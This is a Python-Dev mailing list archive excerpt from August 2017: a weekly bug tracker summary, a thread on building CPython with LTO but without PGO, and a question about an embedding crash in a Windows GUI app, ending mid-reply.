From status at bugs.python.org Fri Aug 4 12:09:20 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 4 Aug 2017 18:09:20 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170804160920.A5F1511A85F@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-07-28 - 2017-08-04) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6100 (+12) closed 36774 (+38) total 42874 (+50) Open issues with patches: 2337 Issues opened (33) ================== #29910: Ctrl-D eats a character on IDLE http://bugs.python.org/issue29910 reopened by terry.reedy #31072: add filter to zipapp http://bugs.python.org/issue31072 opened by irmen #31073: Change metadata handling in check command http://bugs.python.org/issue31073 opened by jambonrose #31074: Startup failure if executable is a \\?\ path on Windows http://bugs.python.org/issue31074 opened by eryksun #31075: Collections - ChainMap - Documentation example wrong order lin http://bugs.python.org/issue31075 opened by Marcos Soutullo #31076: http.server should correctly handle HTTP 1.1 responses without http://bugs.python.org/issue31076 opened by Tom Forbes #31078: pdb's debug command (Pdb.do_debug) doesn't use rawinput even i http://bugs.python.org/issue31078 opened by Segev Finer #31082: reduce takes iterable, not just sequence http://bugs.python.org/issue31082 opened by Stefan Pochmann #31087: asyncio.create_subprocess_* do not honor `encoding` http://bugs.python.org/issue31087 opened by toriningen #31088: regrtest.py: "${test_file_name} skipped" message printed twice http://bugs.python.org/issue31088 opened by Arfrever #31092: Potential multiprocessing.Manager() race condition http://bugs.python.org/issue31092 opened by Prof Plum #31093: IDLE: Add tests for configdialog extensions tab http://bugs.python.org/issue31093 opened by terry.reedy #31094: asyncio: get list of connected clients http://bugs.python.org/issue31094 opened by Dmitry Vinokurov #31095: Checking all tp_dealloc with Py_TPFLAGS_HAVE_GC http://bugs.python.org/issue31095 opened by inada.naoki #31096: asyncio.stream.FlowControlMixin._drain_helper may lead to a bl http://bugs.python.org/issue31096 opened by malinoff #31097: itertools.islice not accepting np.int64 http://bugs.python.org/issue31097 opened by braaannigan #31098: test target of Makefile always run tests in parallel mode http://bugs.python.org/issue31098 opened by Arfrever #31100: unable to open python http://bugs.python.org/issue31100 opened by Kenneth Griffin #31102: deheader: double #incude of the same file http://bugs.python.org/issue31102 opened by dilyan.palauzov #31103: Windows Installer Product Version 3.6.2150.0 Offset By 0.0.150 http://bugs.python.org/issue31103 opened by Markus Kramer #31105: Cyclic GC threshold may need tweaks http://bugs.python.org/issue31105 opened by arigo #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 opened by socketpair #31107: copyreg does not properly mangle __slots__ names http://bugs.python.org/issue31107 opened by ShaneHarvey #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 opened by sir-sigurd #31109: zipimport argument clinic conversion http://bugs.python.org/issue31109 opened by jarondl #31113: Stack overflow with large program http://bugs.python.org/issue31113 opened by Wheerd #31114: 'make install' fails when exec_prefix is '/' and DESTDIR not e http://bugs.python.org/issue31114 opened by xdegaye #31115: Py3.6 threading/reference counting issues with `numexpr` http://bugs.python.org/issue31115 opened by Robert McLeod #31116: base85 z85 variant encoding http://bugs.python.org/issue31116 opened by underrun #31118: Make super() work with staticmethod by using __class__ for bot http://bugs.python.org/issue31118 opened by ashwch #31119: Signal tripped flags need memory barriers http://bugs.python.org/issue31119 opened by njs #31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am http://bugs.python.org/issue31120 opened by hirenvadalia #31121: Unable to exit pdb when script becomes invalid http://bugs.python.org/issue31121 opened by jason.coombs Most recent 15 issues with no replies (15) ========================================== #31121: Unable to exit pdb when script becomes invalid http://bugs.python.org/issue31121 #31119: Signal tripped flags need memory barriers http://bugs.python.org/issue31119 #31118: Make super() work with staticmethod by using __class__ for bot http://bugs.python.org/issue31118 #31116: base85 z85 variant encoding http://bugs.python.org/issue31116 #31115: Py3.6 threading/reference counting issues with `numexpr` http://bugs.python.org/issue31115 #31114: 'make install' fails when exec_prefix is '/' and DESTDIR not e http://bugs.python.org/issue31114 #31098: test target of Makefile always run tests in parallel mode http://bugs.python.org/issue31098 #31096: asyncio.stream.FlowControlMixin._drain_helper may lead to a bl http://bugs.python.org/issue31096 #31094: asyncio: get list of connected clients http://bugs.python.org/issue31094 #31093: IDLE: Add tests for configdialog extensions tab http://bugs.python.org/issue31093 #31092: Potential multiprocessing.Manager() race condition http://bugs.python.org/issue31092 #31087: asyncio.create_subprocess_* do not honor `encoding` http://bugs.python.org/issue31087 #31082: reduce takes iterable, not just sequence http://bugs.python.org/issue31082 #31078: pdb's debug command (Pdb.do_debug) doesn't use rawinput even i http://bugs.python.org/issue31078 #31070: test_threaded_import: KeyError ignored in _get_module_lock. Hello This is my first post after I just have subscribed to the Python-Dev mailing list. In this context, the welcome confirmation message suggested to introduce myself. My name is Octavian Soldea and I am with the Python optimization team in DSLOT group in Intel, Santa Clara, California. In the past I have received a PhD in Computer Science from the Technion, Israel Institute of Technology in Computer Vision. I would like to ask regarding the possibility of compiling Python with lto only. My question is if is the community interested to enable the possibility of compiling Python with lto only, i.e. without pgo? I have followed https://bugs.python.org/issue29243 and https://bugs.python.org/issue29641 however, it is not clear if the separate compilation is already implemented. In my opinion this is a good option since pgo is not always desired. Best regards, Octavian -------------- next part -------------- An HTML attachment was scrubbed... URL: From greg at krypto.org Mon Aug 7 18:12:22 2017 From: greg at krypto.org (Gregory P. Smith) Date: Mon, 07 Aug 2017 22:12:22 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> Message-ID: I've personally never seen a situation where PGO is not desired yet some other fancier optimization such as LTO is. When do you encounter people wanting that? PGO always produces a 10-20% faster CPython interpreter. I have no problem with patches enabling an LTO only build for anyone who wants one if they do not already exist. At the moment I'm not sure which LTO toolchains actually work properly. We removed it from inclusion in --enable-optimizations because it was clearly broken in some common environments. If LTO without PGO is useful, making it work is probably just a matter of making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. [untested] -gps On Mon, Aug 7, 2017 at 12:00 PM Soldea, Octavian wrote: > > > Hello > > > > This is my first post after I just have subscribed to the Python-Dev > mailing list. In this context, the welcome confirmation message suggested > to introduce myself. > > > > My name is Octavian Soldea and I am with the Python optimization team in > DSLOT group in Intel, Santa Clara, California. In the past I have received > a PhD in Computer Science from the Technion, Israel Institute of Technology > in Computer Vision. > > > > I would like to ask regarding the possibility of compiling Python with lto > only. My question is if is the community interested to enable the > possibility of compiling Python with lto only, i.e. without pgo? I have > followed > > https://bugs.python.org/issue29243 > > and > > https://bugs.python.org/issue29641 > > however, it is not clear if the separate compilation is already > implemented. In my opinion this is a good option since pgo is not always > desired. > > > > Best regards, > > Octavian > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From octavian.soldea at intel.com Mon Aug 7 19:01:42 2017 From: octavian.soldea at intel.com (Soldea, Octavian) Date: Mon, 7 Aug 2017 23:01:42 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> Hello Gregory: Thank you for your message. I really appreciate it. In my opinion the use of lto only compilation mode can be of benefit from two reasons at least: 1. Lto only can provide a platform for experimentations. Of course, it seems to be very application specific. 2. Lto compilation is faster than an entire pgo + lto mode. While pgo can take a lot of time, lto can provide significant optimizations, as compared to baseline, at the cost of less compilation time. Of course, lto is time consuming. To the best of my knowledge, compiling with lto only is shorter than combining pgo and lto. In this context, I will be more than happy to receive more feedback and opinions. Best regards, Octavian From: Gregory P. Smith [mailto:greg at krypto.org] Sent: Monday, August 7, 2017 3:12 PM To: Soldea, Octavian ; Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I've personally never seen a situation where PGO is not desired yet some other fancier optimization such as LTO is. When do you encounter people wanting that? PGO always produces a 10-20% faster CPython interpreter. I have no problem with patches enabling an LTO only build for anyone who wants one if they do not already exist. At the moment I'm not sure which LTO toolchains actually work properly. We removed it from inclusion in --enable-optimizations because it was clearly broken in some common environments. If LTO without PGO is useful, making it work is probably just a matter of making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. [untested] -gps Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg%40krypto.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Mon Aug 7 19:43:19 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Tue, 8 Aug 2017 01:43:19 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> Message-ID: I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit from > two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, lto > is time consuming. To the best of my knowledge, compiling with lto only is > shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback and > opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question regarding lto > > > > I've personally never seen a situation where PGO is not desired yet some > other fancier optimization such as LTO is. When do you encounter people > wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone who > wants one if they do not already exist. At the moment I'm not sure which > LTO toolchains actually work properly. We removed it from inclusion in > --enable-optimizations because it was clearly broken in some common > environments. > > > > If LTO without PGO is useful, making it work is probably just a matter of > making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in > targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com > From peter.xihong.wang at intel.com Mon Aug 7 20:00:10 2017 From: peter.xihong.wang at intel.com (Wang, Peter Xihong) Date: Tue, 8 Aug 2017 00:00:10 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> Message-ID: <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com From octavian.soldea at intel.com Mon Aug 7 20:07:31 2017 From: octavian.soldea at intel.com (Soldea, Octavian) Date: Tue, 8 Aug 2017 00:07:31 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Hello Thank you for your messages. I am not quite sure I understood, therefore, I would like to ask if you see beneficial to have the option of lto separately? Best regards, Octavian -----Original Message----- From: Wang, Peter Xihong Sent: Monday, August 7, 2017 5:00 PM To: Victor Stinner ; Soldea, Octavian Cc: Python-Dev at python.org Subject: RE: [Python-Dev] first post introduction and question regarding lto We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com From greg at krypto.org Mon Aug 7 20:12:52 2017 From: greg at krypto.org (Gregory P. Smith) Date: Tue, 08 Aug 2017 00:12:52 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: I don't know whether it is beneficial or not - but having the capability to build LTO without PGO seems reasonable. I can review any pull requests altering configure.ac and Makefile.pre.in to make such a change. - at gpshead On Mon, Aug 7, 2017 at 5:08 PM Soldea, Octavian wrote: > Hello > > Thank you for your messages. I am not quite sure I understood, therefore, > I would like to ask if you see beneficial to have the option of lto > separately? > > Best regards, > Octavian > > > > > > > -----Original Message----- > From: Wang, Peter Xihong > Sent: Monday, August 7, 2017 5:00 PM > To: Victor Stinner ; Soldea, Octavian < > octavian.soldea at intel.com> > Cc: Python-Dev at python.org > Subject: RE: [Python-Dev] first post introduction and question regarding > lto > > We evaluated different tests before setting down and proposing regrtest > suite for PGO training, including using OpenStack benchmarks for OpenStack > applications. The regrtest suite was found consistently giving the best in > terms of performance across applications/workloads. > > So I would hesitate to remove any test from the training suite (for the > purpose of reducing build time), unless we are absolute sure it will not > hurt performance across the board. > > Thanks, > > Peter > > -----Original Message----- > From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang= > intel.com at python.org] On Behalf Of Victor Stinner > Sent: Monday, August 07, 2017 4:43 PM > To: Soldea, Octavian > Cc: Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question regarding > lto > > I don't think that PGO compilation itself is slow. Basically, I expect > that it only doubles the compilation time, but compiling Python takes less > than 1 minute usually. The slow part is the profiling task: run the full > Python test suite, which takes at least 20 minutes. The tests must be run > sequentially. > > It would help to reduce the number of tests run in the profiling task. > We should also maybe skip tests which depend too much on I/O to get more > reproductible PGO performances. > > Victor > > 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > > Hello > > > > > > > > Gregory: Thank you for your message. I really appreciate it. > > > > > > > > In my opinion the use of lto only compilation mode can be of benefit > > from two reasons at least: > > > > 1. Lto only can provide a platform for experimentations. Of > course, it > > seems to be very application specific. > > > > 2. Lto compilation is faster than an entire pgo + lto mode. While > pgo > > can take a lot of time, lto can provide significant optimizations, as > > compared to baseline, at the cost of less compilation time. Of course, > > lto is time consuming. To the best of my knowledge, compiling with lto > > only is shorter than combining pgo and lto. > > > > > > > > In this context, I will be more than happy to receive more feedback > > and opinions. > > > > > > > > Best regards, > > > > Octavian > > > > > > > > > > > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > > Sent: Monday, August 7, 2017 3:12 PM > > To: Soldea, Octavian ; > > Python-Dev at python.org > > Subject: Re: [Python-Dev] first post introduction and question > > regarding lto > > > > > > > > I've personally never seen a situation where PGO is not desired yet > > some other fancier optimization such as LTO is. When do you encounter > > people wanting that? PGO always produces a 10-20% faster CPython > interpreter. > > > > > > > > I have no problem with patches enabling an LTO only build for anyone > > who wants one if they do not already exist. At the moment I'm not > > sure which LTO toolchains actually work properly. We removed it from > > inclusion in --enable-optimizations because it was clearly broken in > > some common environments. > > > > > > > > If LTO without PGO is useful, making it work is probably just a matter > > of making sure @LTOFLAGS@ show up on the non-PGO related > > Makefile.pre.in targets as well as updating the help text for > --with-lto in configure.ac. > > [untested] > > > > > > > > -gps > > > > > > > > > > Python-Dev mailing list > > Python-Dev at python.org > > https://mail.python.org/mailman/listinfo/python-dev > > Unsubscribe: > > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > > > > _______________________________________________ > > Python-Dev mailing list > > Python-Dev at python.org > > https://mail.python.org/mailman/listinfo/python-dev > > Unsubscribe: > > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > > ail.com > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From patrick.rutkowski at gmail.com Mon Aug 7 20:11:13 2017 From: patrick.rutkowski at gmail.com (Patrick Rutkowski) Date: Mon, 7 Aug 2017 20:11:13 -0400 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() Message-ID: I'm working on Windows. I have the following dead simple embedding code that I'm using to test out the python interpreter: ============================================================ Py_SetProgramName(L"MyApp"); Py_SetPath( L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64\\python36.zip;" L"C:\\Users\\rutski\\Documents\\python\\DLLs;" L"C:\\Users\\rutski\\Documents\\python\\lib;" L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64;" L"C:\\Users\\rutski\\Documents\\python;" L"C:\\Users\\rutski\\Documents\\python\\lib\\site-packages"); Py_Initialize(); PyRun_SimpleString( "from time import time,ctime\n" "print('Today is', ctime(time()))\n"); ============================================================ This code crashes trying to access address 0x00000010 from within PyRun_SimpleString(). The sequence of event's is this: 1) PyRun_SimpleString() tries to do AddModule("__main__") 2) AddModule tries to do PyImport_GetModuleDict() 3) PyImport_GetModuleDict() tries to doPyThreadState_GET()->interp 4) PyThreadState_GET() returns NULL, so the ->interp part crashes. The weird thing is that calling PyImport_GetModuleDict() from within my application directly works just fine. Weirder still is that the whole thing actually executes fine if I build a windows command line application with the embed code in main(), and execute it from a terminal. The crash only happens when building a Windows GUI application and calling the embed code in WinMain(). This is a python interpreter that I built from source on windows using PCbuild\build.bat, so that I could track the crash. However, the exact same crash was happening with the stock interpreter provided by the python windows installer. Does anyone have any ideas here? -Patrick From octavian.soldea at intel.com Mon Aug 7 20:40:08 2017 From: octavian.soldea at intel.com (Soldea, Octavian) Date: Tue, 8 Aug 2017 00:40:08 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB2914@ORSMSX115.amr.corp.intel.com> Hi Gregory Thank you for your message. I will conduct several experiments and try to come back as soon as possible with a conclusion. Best regards, Octavian From: Gregory P. Smith [mailto:greg at krypto.org] Sent: Monday, August 7, 2017 5:13 PM To: Soldea, Octavian ; Wang, Peter Xihong ; Victor Stinner Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't know whether it is beneficial or not - but having the capability to build LTO without PGO seems reasonable. I can review any pull requests altering configure.ac and Makefile.pre.in to make such a change. - at gpshead On Mon, Aug 7, 2017 at 5:08 PM Soldea, Octavian > wrote: Hello Thank you for your messages. I am not quite sure I understood, therefore, I would like to ask if you see beneficial to have the option of lto separately? Best regards, Octavian -----Original Message----- From: Wang, Peter Xihong Sent: Monday, August 7, 2017 5:00 PM To: Victor Stinner >; Soldea, Octavian > Cc: Python-Dev at python.org Subject: RE: [Python-Dev] first post introduction and question regarding lto We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian > Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian >: > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian >; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg%40krypto.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry at hastings.org Mon Aug 7 20:44:48 2017 From: larry at hastings.org (Larry Hastings) Date: Mon, 7 Aug 2017 17:44:48 -0700 Subject: [Python-Dev] PyThreadState_GET() returns NULL from within PyImport_GetModuleDict() In-Reply-To: References: Message-ID: <2b758940-ce06-f357-88f2-5ec1fb15dd55@hastings.org> On 08/07/2017 05:11 PM, Patrick Rutkowski wrote: > Does anyone have any ideas here? My one idea: 